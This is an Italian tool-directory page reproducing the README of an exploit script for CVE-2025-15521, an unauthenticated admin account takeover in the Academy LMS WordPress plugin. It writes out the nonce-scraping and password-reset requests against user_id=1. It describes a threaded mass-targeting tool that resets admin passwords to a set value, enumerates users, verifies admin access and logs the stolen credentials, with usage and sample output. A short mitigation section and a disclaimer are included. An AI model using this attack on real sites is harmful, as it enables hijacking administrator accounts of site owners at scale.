Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-15521 — Il plugin Academy LMS – WordPress LMS Plugin for Complete eLearning Solution per WordPress è vulnerabile all'escalation dei privilegi tramite account takeover in tutte le versioni fino alla 3.5.0 inclusa. | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-15521
RicognizioneAttacchi alle PasswordAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingAutenticazione
GitHubnxploited/cve-2025-15521

CVE-2025-15521

Il plugin Academy LMS – WordPress LMS Plugin for Complete eLearning Solution per WordPress è vulnerabile all'escalation dei privilegi tramite account takeover in tutte le versioni fino alla 3.5.0 inclusa.

114 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

CVE-2025-15521

Il plugin Academy LMS – WordPress LMS Plugin for Complete eLearning Solution per WordPress è vulnerabile all'escalation dei privilegi tramite account takeover in tutte le versioni fino alla 3.5.0 inclusa.

root@kitploit:~
 _____ _____ _____     ___ ___ ___ ___     ___   ___ ___ ___ ___  
|     |  |  |   __|___|_  |   |_  |  _|___|_  | |  _|  _|_  |_  | 
|   --|  |  |   __|___|  _| | |  _|_  |___|_| |_|_  |_  |  _|_| |_
|_____|\___/|_____|   |___|___|___|___|   |_____|___|___|___|_____|

Telegram CVE CVSS Python

📡 Segui @KNxploited — disclosure delle CVE ed exploit funzionanti, senza ritardi.


Cos'è questo

CVE-2025-15521 — Account takeover non autenticato tramite il reset della password in Academy LMS ≤ 3.5.0.

Il gestore del reset del plugin autentica la richiesta utilizzando solo un nonce esposto pubblicamente (academy_nonce) incorporato nelle pagine dei corsi. Nessun token viene inviato all'email dell'utente. Nessun controllo della sessione. Nessuna verifica dell'identità. Un attaccante che legge una qualsiasi pagina di un corso ottiene un nonce valido e poi resetta la password di qualsiasi account fornendo un user_id — incluso user_id=1 (l'amministratore del sito).

CVSS 3.1: 9.8 Critico — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNA: Wordfence


Come funziona la vulnerabilità

root@kitploit:~
GET /course/any-course/
  → L'HTML contiene: "academy_nonce": "a1b2c3d4e5"   ← pubblico, nessuna autenticazione

POST /academy-retrieve-password/?user_id=1
  new_password=<anything>
  confirm_new_password=<anything>
  security=a1b2c3d4e5                               ← nonce accettato

  → Password per user_id=1 modificata. Nessuna email. Nessuna conferma.

Il gestore chiama wp_set_password() dopo aver verificato soltanto wp_verify_nonce() su un nonce trasmesso a ogni visitatore. Non viene verificato che l'utente che effettua la richiesta sia il proprietario dell'account da modificare.


Cosa fa questo script

  1. Esegue il crawling delle pagine dei corsi per estrarre un academy_nonce valido
  2. Attiva il gestore del reset per un user_id target con una password scelta
  3. Enumera gli username tramite i redirect /?author=N e la REST API (/wp-json/wp/v2/users)
  4. Tenta un login rigoroso per ogni candidato:
    • Rifiuta i messaggi di errore noti
    • Richiede il cookie wordpress_logged_in
    • Richiede indicatori reali dell'interfaccia admin in /wp-admin — non solo una risposta 200
  5. Scrive le voci di accesso confermate in un file di output — nulla di sensibile viene stampato sul terminale

Requisiti

root@kitploit:~
pip install requests colorama urllib3

Richiede Python 3.8+. Consigliato Python 3.10+.


Utilizzo

root@kitploit:~
python CVE-2025-15521.py

Ti verrà richiesto di inserire:

root@kitploit:~
File dell'elenco dei target (un URL per riga): list.txt
Thread (siti simultanei) [5]: 10
Percorso del gestore di reset [/academy-retrieve-password/]:
Percorso root dei corsi (fonte della chiave) [/course/]:
Max sottopagine /course/ da scansionare per sito [15]:
user_id da resettare (target del gestore) [1]:
Nuova password da impostare [adminSA]:
Timeout HTTP (secondi) [10]:
File di output [scan_results/academy_access_success.txt]:

File dei target — un URL per riga, schema opzionale:

root@kitploit:~
https://target1.com
target2.com
https://target3.com/lms

Output

Terminale — una riga per target, nessuna credenziale stampata:

root@kitploit:~
[14:02:11] [https://target.com] KEY: OK   | RESET: OK   | ACCESS: 1 HIT
[14:02:13] [https://target2.com] KEY: FAIL | RESET: -    | ACCESS: 0 HIT

File — solo le voci di accesso confermate:

root@kitploit:~
[2025-04-18T14:02:11] https://target.com - account=admin  pass=adminSA

Rilevamento e Mitigazione

Per i difensori:

Blocca o monitora le richieste POST non autenticate verso l'endpoint di reset:

root@kitploit:~
POST *academy-retrieve-password* con parametro: security=

Controlla l'esposizione di rm_admin_order / academy_nonce nel sorgente delle pagine dei corsi del tuo tema. Se il nonce è visibile senza essere autenticati — la tua versione è vulnerabile.

Passaggi immediati per la correzione:

  • Aggiorna Academy LMS a una versione successiva alla 3.5.0
  • Disattiva temporaneamente il plugin se non è disponibile una patch
  • Controlla le password admin modificate di recente
  • Forza il reset delle password su tutti gli account amministratore
  • Implementa la verifica tramite token via email per qualsiasi flusso di reset della password

⚠️ Disclaimer

Questo strumento è destinato esclusivamente a ricerca sulla sicurezza autorizzata e test di penetrazione.
Eseguilo solo su sistemi di tua proprietà o per i quali disponi di un'autorizzazione scritta esplicita al test.
L'autore non si assume alcuna responsabilità per usi non autorizzati o illegali.
L'uso non autorizzato viola il CFAA, il CMA, la Direttiva UE 2013/40/UE, la legge saudita contro i crimini informatici n. M/17 e le leggi equivalenti in tutto il mondo.


Di Nxploited (Khaled Alenazi)
t.me/KNxploited · github.com/Nxploited

🔔 Segui @KNxploited su Telegram per le ultime CVE e le release degli exploit.

Scarica lo strumento